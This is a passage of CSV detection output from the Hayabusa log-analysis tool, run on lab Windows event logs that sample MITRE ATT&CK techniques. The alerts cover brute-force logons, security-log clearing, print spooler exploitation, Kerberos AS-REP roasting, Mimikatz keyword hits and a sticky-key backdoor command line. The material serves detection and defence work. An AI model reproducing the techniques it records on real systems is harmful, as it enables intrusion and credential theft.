admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 
17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 
0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log 
was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 
06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 
0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 
0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER 
: Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:22.562 
+09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 
0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : 
